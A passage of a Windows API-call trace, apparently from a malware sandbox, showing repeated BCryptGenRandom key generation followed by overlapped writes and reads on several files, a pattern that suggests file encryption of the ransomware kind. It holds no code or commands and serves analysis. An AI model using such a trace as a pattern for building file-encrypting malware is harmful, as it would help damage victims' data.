(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.563] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.563] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.563] free (_Block=0x3e305b8) [0150.563] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.563] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.564] free (_Block=0x1fa91d0) [0150.564] free (_Block=0x1fa2ed8) [0150.564] free (_Block=0x1fa90b8) [0150.564] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.564] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.566] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.567] CloseHandle (hObject=0x308) returned 1 [0150.567] free (_Block=0x3df0008) [0150.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.580] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.580] free (_Block=0x3e305b8) [0150.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.580] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.581] free (_Block=0x1fa91d0) [0150.581] free (_Block=0x1fa2ed8) [0150.581] free (_Block=0x1fa90b8) [0150.581] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.582] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.596] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7c4e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.598] CloseHandle (hObject=0x308) returned 1 [0150.598] free (_Block=0x3df0008) [0150.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.609] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.609] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.610] free (_Block=0x3e305b8) [0150.610] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.610] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.610] free (_Block=0x1fa91d0) [0150.610] free (_Block=0x1fa2ed8) [0150.610] free (_Block=0x1fa90b8) [0150.610] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.612] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.614] CloseHandle (hObject=0x308) returned 1 [0150.614] free (_Block=0x3df0008) [0150.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.625] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.625] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.626] free (_Block=0x3e305b8) [0150.626] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.626] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.626] free (_Block=0x1fa91d0) [0150.626] free (_Block=0x1fa2ed8) [0150.626] free (_Block=0x1fa90b8) [0150.626] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.628] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.629] CloseHandle (hObject=0x308) returned 1 [0150.630] free (_Block=0x3df0008) [0150.630] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.641] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.641] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.641] free (_Block=0x3e305b8) [0150.642] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.642] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.642] free (_Block=0x1fa91d0) [0150.642] free (_Block=0x1fa2ed8) [0150.642] free (_Block=0x1fa90b8) [0150.642] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.644] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.655] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.657] CloseHandle (hObject=0x308) returned 1 [0150.657] free (_Block=0x3df0008) [0150.657] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.694] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.694] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.694] free (_Block=0x3e305b8) [0150.694] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.694] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.694] free (_Block=0x1fa91d0) [0150.694] free (_Block=0x1fa2ed8) [0150.694] free (_Block=0x1fa90b8) [0150.695] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.696] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.719] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a18, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.733] free (_Block=0x3e305b8) [0150.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.733] free (_Block=0x1fa91d0) [0150.733] free (_Block=0x1fa2ed8) [0150.733] free (_Block=0x1fa90b8) [0150.733] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.756] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.764] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x302c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.820] CloseHandle (hObject=0x2a8) returned 1 [0150.821] free (_Block=0x3e70008) [0150.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.827] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.831] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.832] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.833] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x7a50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0151.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0151.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0151.930] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0151.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0151.930] free (_Block=0x3e305b8) [0151.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0151.930] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0151.931] free (_Block=0x1fa91d0) [0151.931] free (_Block=0x1fa2ed8) [0151.931] free (_Block=0x1fa90b8) [0151.931] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0151.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0151.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0151.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0151.942] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0151.942] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0151.942] free (_Block=0x3e305b8) [0151.942] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0151.942] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0151.943] free (_Block=0x1fa91d0) [0151.943] free (_Block=0x1fa2ed8) [0151.943] free (_Block=0x1fa90b8) [0151.943] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0151.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.120] CloseHandle (hObject=0x308) returned 1 [0152.120] free (_Block=0x1ff1e60) [0152.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.136] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.136] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.136] free (_Block=0x3e305b8) [0152.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.136] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.137] free (_Block=0x1fa91d0) [0152.137] free (_Block=0x1fa2ed8) [0152.137] free 